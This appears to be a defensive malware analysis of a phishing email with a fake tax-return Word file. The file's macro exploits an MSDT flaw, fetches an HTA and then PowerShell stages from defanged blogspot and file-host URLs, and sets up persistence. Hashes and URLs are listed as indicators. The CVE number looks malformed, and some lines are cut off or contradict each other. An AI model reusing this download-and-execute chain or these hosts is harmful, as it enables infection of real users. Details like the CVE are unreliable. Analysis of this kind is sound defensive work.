Initial Email

An email was discovered from comel[@]industry-mass[.]com. This site was created within the last 15 days.
The email was titled Tax return 2022 and contained a .docx file.

Opening this file initially looks like an actual tax return. I have redacted the private information from the screenshot

Behind the scenes, a macro runs that exploits the CVE-2022-301090 MSDT vulnerability.

Payload Stage 1: MSDT Vulnerability

The macro calls out to hxxps:\files[.]catbox[.]moe/sndoli[.]hta which contains obfuscated script.

When chained with the CVE-2022-301090 vuln, this becomes powershell that makes an IEX request to hxxps://powpowpowffs5[.]blogspot[.]com/atom.xml. This URL immediately 302 redirects to 529f38d0-3744-4286-b484-be860d475d25[.]usrfiles[.]com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42.txt for the stage 2 powershell.

Payload Stage 2: Main Powershell

More obfuscation. The initial steps of the script kills several windows processes, it then saves the payload to C:\ProgramFiles\MEMEMAN\CypherDeptoggraphy.~+~ before decrypting to a ScheduledTask creation for the file C:\ProgramData\MEMEMAN\UpdateEscan.js.

Execution

The final payload was downloaded and executed within PowerShell around 2:17p 22 Mar. The payload was able to successfully copy itself & create additional files to the MEMEMAN dir. Next it cloned itself to the Windows startup directory and create the two scheduled tasks to maintain persistence.

Antivirus detection of proces

Indicators

Hashes

SHA256 HashDescription
9e49747bcd7e4eea173a793a0a6c34f3533dc23cf6565d32e4de3a33ad3c8fedSHA2 of initial .docx file
dac71c21f264036c2c0288340ad6889002a4ed8f4dee74da35b15f7a8a26b473SHA2 of the .hta file
a905e397a6bb3374a54fa8ebccf57ff3b8d0f2cd0aca4c9091b0b19fd85d67b3SHA2 of the master payload
9c7aefd09d3939a04aa2e36e553881b3ffd88efe8fdda7121a80f37653606b0dSHA2 of REALENGINEUPDATE.js, a persistence file spawned by the execution of the master payload
6b4fb85973c337fd7cf1b272ab313557a2d256314ab599638fac3ba3d6e8ffb7SHA2 of UpdateEscan.js, a persistence file spawned by the execution of the master payload
e7831599adde64042091b5db47032e3a3c3b2f7b8720156900b38f35ca2d8936SHA2 of WindowsDEFENDERUPDATE.js, a persistence file spawned by the execution of the master payload
9b57c468f4df5bbedb75d0027348a2dd278e4d168b83a6e74c777d6737de0606SHA2 of CypherDeptography.~_~, a persistence file spawned by the execution of the master payload

URLs

URLDescription
urlcallinghta6[.]blogspot[.]com/atom[.]xml1st URL request from .docx file
files[.]catbox[.]moe/sndoli[.]hta2nd URL that was the result of a 302 redirect from 1st URL.
powpowpowffs5[.]blogspot[.]com/atom[.]xml3rd URL that was contacted from the decoded powershell code in sndoli.hta
529f38d0-3744-4286-b484-be860d475d25[.]usrfiles.com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42[.]txt4th URL that was the result of a 302 redirect from 3rd URL
bakc2000[.]blogspot.com/atom[.]xmlURL used by one of the files for persistence, re
backuphotelall[.]blogspot.com/atom[.]xmlURL used by one of the files for persistence

Other Resources